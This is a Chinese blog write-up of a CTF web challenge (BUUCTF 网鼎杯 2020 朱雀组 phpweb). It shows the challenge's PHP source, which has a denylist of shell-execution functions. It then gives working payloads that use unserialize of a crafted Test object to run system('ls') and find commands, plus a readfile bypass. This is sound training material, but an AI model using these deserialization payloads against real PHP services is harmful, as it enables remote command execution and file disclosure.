BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化

最新推荐文章于 2024-05-13 09:10:34 发布
最新推荐文章于 2024-05-13 09:10:34 发布
阅读量731 收藏 2
点赞数
分类专栏: 反序列化/序列化 Classical CTF-WEB 文章标签: php 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/118225694
版权

BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化
题目
Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone ‘UTC’ for now, but please set date.timezone to select your timezone. in /var/www/html/index.php on line 24
2021-06-25 09:41:34 am
在这里插入图片描述
一开始用BurpSuite抓包的时候,我还以为是SQL注入。结果好一段时间都做不出来。后来看了别人的WP发现根本就不是…
在这里插入图片描述
这里需要用的file_get_contents来读取index.php文件
所以payload:func=file_get_contents&p=index.php
在这里插入图片描述

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
?>

好吧,这是个反序列化的题目
其中要注意的是这里有两个func的变量,其中第一个func会被过滤一些信息,但是第二个不会!

if (!in_array($func,$disable_fun))

首先我们需要用system('ls')来读取当前目录下有什么文件,但是第一个$func过滤了system这个函数,却没有过滤unserialize
所以payload::func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:2:"ls";}
这样就可以读取当前目录下的文件了
在这里插入图片描述
所以,需要尝试搜索一下flag文件!
payload:func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:19:"find / -name *flag*";}
注意,这里运行很慢,因为他找这个flag相关的文件需要花很多时间。(一开始我还以为我写错了代码)
在这里插入图片描述
在这里插入图片描述
另外,关于读取flag还有另外一种写法:func=readfile&p=/tmp/flagoefiu4r93
理由是第一个func没有过滤readfile这个函数,所以可以直接读取!
在这里插入图片描述

若丶时光破灭
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】CTF极客大挑战2019PHP解题详析(Dirsearch+php反序列化
等风来
08-24 4631
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
CTF-反序列化
qq_61774705的博客
08-15 4340
反序列化
【CTF】buuctf web(三)——PHP序列化与反序列化
m0_52923241的博客
08-04 1758
[极客大挑战 2019]PHP 题目类型:序列化与反序列化 这儿提示备份网站,用dirsearch扫一下后台目录 输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php 找到www.zip,访问一下 跳出弹窗,点击下载 发现有flag.php目录 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 无用信息 查看index.php
[网络安全 CTF] BUUCTF极客大挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)_[极客大挑战 2019]php
最新发布
2401_84971538的博客
05-13 411
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计
weixin_44632787的博客
07-28 1580
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计 知识点 反序列化中的对象逃逸 extract()变量覆盖 虽然这题说很easy,但是一点都不easy。我花了好长的时间才能看懂。但是里面的知识点却很有意思,希望我能记下来… 废话不多说,放代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','
buuctf】MRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 981
真的很详细
网鼎2020-朱雀.rar
05-24
【网鼎2020-朱雀】是2020网鼎杯网络安全竞赛中朱雀的相关挑战资料,这个压缩包可能包含了该竞赛的Web类题目。网鼎杯是中国知名的网络安全技术大赛,旨在提升参赛者的网络安全技能,促进网络安全行业的健康发展...
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,webweb题为thinkjava
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
09-11
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
json-lib-2.4.src.zip
06-12
Json-lib是一个java类库,它用于把beans, maps, collections, java arrays and XML 传递给一个Json,或者返回来把Json来传递beans, maps, collections, java arrays and XML ,说白了就是用于处理JSON数据的,包括...
buuctf-ReadlezPHP(反序列化)
m0_62094846的博客
05-22 360
点开后是源代码,要把前面的view-source:删了 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ ...
php反序列化-BUUCTF刷题记录
cike_y
11-30 842
在前面得知要想获取flag,必须恒等于相对应对象成员的变量,这里也不在解释了。继续分析第二部分,可以看见这部分代码属于传参的判断语句,简单来说,你想要控制第一部分的成员变量的恒等于获得flag,就必须要从最后一个php语句的obj进行接受传参内容,前提是让以上的if条件的判断为真。我们先看第一部分较为关键的代码,可以清楚的看见要想获取flag,就必须要让BUU类对象的成员correct的变量恒等于input成员的变量。序列化payload:O:3:“BUU”:2:{s:7:“correct”;
CTFWeb-PHP弱比较与反序列化利用姿势
道阻且长,行则将至。
04-30 1746
文章目录前言PHP的弱比较No.1 ACTF- PHP的弱比较利用No.2 BJDCTF-MD5的弱/强碰撞PHP反序列化No.1 网鼎杯-朱雀phpwebNo.2 网鼎杯-青龙AreUSerialz 前言 在 CTF 比赛的 Web 类型题目中, PHP 反序列化漏洞的题目层出不穷,本文的目的在于通过 BUUCTF 平台几道真实的 CTF 竞赛题目,总结 PHP 反序列化漏洞在 CTF 竞赛中的一些题目类型和利用姿势。 PHP的弱比较 进入正题之前,先介绍下 PHP 弱比较的相关知识,因为它经常出现在
BUUCTF-web [极客大挑战 2019]PHP1 之 反序列化漏洞
yu_jing_hong的博客
12-02 2900
PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼凑还原数据的过程。 二,PHP中的反序列方法 PHP通过string serialize ( mixed $value )和mixed unserialize ( string $str )两个函数实现序列化和反序列化。 序列化:serialize()将一个对象转换成一个字符串。反序列化:un.
BUUCTF——Basic题解
Zichel77的博客
08-17 5592
所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct。文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程一般被称为文件包含。于是涉及到了md5绕过的问题,md5这个地方可以用md5弱碰撞,因为是弱类型比较。以下几个的md5弱类型比较均相等。...
Web方向】 3-1 PHP反序列化buuCTF实例UnserializeOne wp
wanderer的博客
11-16 462
BUUCTF PHP反序列化UnserializeOne wp,过程有点绕脑……
buuctf easy_serialize_php 解析
qq_73722777的博客
03-29 154
因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,于是我们尝试直接给_SESSION[img]赋值。s:59:"a做为user的属性值,读取到a的时候结束,后面的;进行了闭合,相当于吞掉了一个属性和值,接着会继续读取我们构造的img,由于总共三个属性,我在后边加上了一个属性和值,后边的序列化结果直接就被丢弃。将这里的user和function进行修改,然后这里会进行代码一开始的过滤,将变量$img中的php flag php5 php4 fl1g的字符串替换成’'空字符。
[网鼎杯 2020 朱雀]phpweb
03-16
phpweb是一种基于PHP语言开发的Web应用程序框架,它提供了一系列的工具和函数库,使得开发者可以更加高效地构建Web应用程序。phpweb具有易于学习、易于使用、易于扩展等特点,因此在Web应用程序开发中得到了广泛的应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值